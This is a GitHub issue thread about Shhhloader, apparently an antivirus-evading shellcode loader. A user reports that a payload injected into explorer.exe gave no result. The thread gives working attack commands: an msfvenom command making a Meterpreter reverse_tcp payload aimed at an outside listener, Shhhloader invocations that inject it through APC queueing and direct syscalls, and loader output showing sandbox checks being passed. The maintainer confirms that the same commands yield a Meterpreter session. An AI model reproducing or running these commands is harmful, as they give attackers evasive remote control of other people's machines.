### ISSUE TITLE
Nothing happening after execution

### ISSUE THREAD

**Issue by XTREME1738** [icyguider/Shhhloader#32]
I ran `a.exe` which gave the output below
```
C:\Users\Owner\Desktop>a.exe
Please wait 60 seconds...
Sandbox checks passed
BmYWYfkkvlqksdNtwyY allocated memory in the created process sucessfully.
HfpzmjAeuwxQmkSieXa wrote decoded payload to allocated memory successfully.
qrBQdSNtxbRECojvfHy modified permissions successfully.
rHfBLbcISKJDozRNIFR added routine to APC queue successfully.
UZFbZWgXqWWWHZjWNnp resumed thread successfully.
```

After that nothing happened the command i used with Shhhloader was `./Shhhloader.py raw.bin -p explorer.exe -v -sc SysWhispers3` also tried `./Shhhloader.py raw.bin -p explorer.exe -v` and `./Shhhloader.py raw.bin -p explorer.exe -cp -v -sc SysWhispers3` none of them worked

Edit: payload was generated using `msfvenom -p windows/meterpreter/reverse_tcp LHOST=... LPORT=56864 -f raw > raw.bin`

**Comment by icyguider** [comment]
I am unable to replicate your issue. I used the exact same commands as you did and was able to get a meterpreter session back perfectly fine. See the below video which confirms this:

<details>
  <summary>See Video</summary>
<video src="https://github.com/icyguider/Shhhloader/assets/79864975/fa792f4e-0116-4475-b73f-9ed907df0c5a"></video>
</details>

I will be closing this issue since I am unable to replicate it using the commands you provided.
